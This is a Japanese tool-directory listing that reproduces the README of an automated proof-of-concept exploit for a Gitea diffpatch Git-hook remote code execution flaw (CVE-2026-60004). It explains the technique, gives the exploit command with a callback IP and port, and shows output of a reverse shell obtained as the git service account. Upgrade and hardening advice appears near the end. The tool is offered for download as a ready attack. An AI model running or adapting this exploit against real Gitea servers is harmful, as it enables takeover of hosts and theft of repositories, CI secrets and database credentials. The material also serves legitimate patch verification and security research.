Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-60004 — CVE-2026-60004 の自動化された概念実証エクスプロイト。これは Gitea の diffpatch Git フック RCE であり、post-index-change フックを仕込んでサービスアカウントとしてリバースシェルを取得します。 | Kitploit
ツール/GitHubGitHub/yym8538/cve-2026-60004
脆弱性分析エクスプロイトウェブアプリケーション悪用ポストエクスプロイトウェブセキュリティペネトレーションテストレッドチーミングリモートアクセスツールペイロード開発
GitHubyym8538/cve-2026-60004

CVE-2026-60004

CVE-2026-60004 の自動化された概念実証エクスプロイト。これは Gitea の diffpatch Git フック RCE であり、post-index-change フックを仕込んでサービスアカウントとしてリバースシェルを取得します。

11ヶ月前未レビュー
リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-60004 Gitea diffpatch RCE

★ CVE-2026-60004 Gitea diffpatch Git Hook RCE PoC ★

https://github.com/user-attachments/assets/403a70f4-4ff4-4ab7-b11c-d73d70adaf0b


概要

CVE-2026-60004 は Gitea における リモートコード実行 (RCE) 脆弱性です。 diffpatch API は提供されたパッチを git apply --cached で適用しますが、これはインデックスのみを操作するはずで、決してファイルをディスクに書き込んではいけません。 同じパッチを2回送信することで、攻撃者は add/add 衝突を引き起こし、Git の three-way merge フォールバック (-3) を誘発します。この経路は --cached を無視し、ファイルを作業ツリーにチェックアウトします。 一時クローンは bare であるため、その作業ツリーのルートは $GIT_DIR になります。したがって、実行可能な hooks/post-index-change を作成するパッチは、生きた Git フックを配置することになり、Git は次のインデックス更新時にそれを自動的に実行します — つまり Gitea サービスアカウントとしてコマンドが実行されます。 このエンドポイントにはリポジトリへの書き込みアクセスが必要ですが、登録はデフォルトで有効になっているため、サインアップしてリポジトリを作成できるユーザーなら誰でも到達できます。


影響を受けるバージョン

カテゴリバージョン
脆弱Gitea 1.17 ≤ version ≤ 1.27.0
修正済みGitea 1.27.1 以降

影響

  • Gitea サービスアカウント (git) としてのリモートコード実行
  • ホストされているすべてのリポジトリ、CI シークレット、データベース認証情報へのアクセス

環境

脆弱な Gitea 環境をビルドして実行します。登録はオープンのままで、 サーバーには Git 2.32+ が同梱されており、攻撃が依存する -3 フォールバックが有効になっています。

root@kitploit:~
docker build -t cve-2026-60004 .
docker run -d --name cve-2026-60004 -p 3000:3000 cve-2026-60004
前提条件このラボでの状態
Gitea 1.17 – 1.27.01.27.0
サーバー上の Git 2.32+ (-3 を有効化)2.54
オープン登録有効 (デフォルト)
リポジトリへの書き込みアクセス自己登録アカウント経由

PoC

エクスプロイトは gitea_exploit.py によって完全に自動化されています。リポジトリを 作成できるアカウントがあれば、ターゲットリポジトリを作成し、Git の -3 フォールバックが発火するまで同じパッチを繰り返し送信し、内蔵リスナーでリバースシェルをキャッチします — 手動セットアップ、パッチ作成、blob ハッシュ計算は不要です。

root@kitploit:~
# python3 gitea_exploit.py <target ip:port> <callback ip> [callback port]
python3 gitea_exploit.py 172.17.0.2:3000 172.17.0.3 4444 \
  --user test --pw 11111111 --repo rce

-3 フォールバックは特定のタイミングウィンドウでのみ発火するため、スクリプトは create → send → send をキャッチするまでループします (デフォルト25回)。送信がブロックされると、 フックが発火しており、リスナーが git としてシェルに接続します:

root@kitploit:~
[*] attempt  3/25 -> send#1 201, send#2 timeout   <- BLOCKED (fired!)
[+] shell from 172.17.0.2:53344 -- type commands, Ctrl-C to quit
uid=1000(git) gid=1000(git) groups=1000(git)

オプション:

  • --no-listen — 内蔵リスナーの代わりに独自の外部 nc でシェルをキャッチする
  • --user / --pw / --repo / --branch — デフォルトのアカウントとターゲットリポジトリを上書きする

緩和策

  • Gitea を 1.27.1 以降にアップグレードする
  • 必要でなければオープン登録を無効にする (DISABLE_REGISTRATION=true)
  • インスタンスに到達してリポジトリを作成できるユーザーを制限する

分析

  • KR: 近日公開!
  • EN:
ツールをダウンロード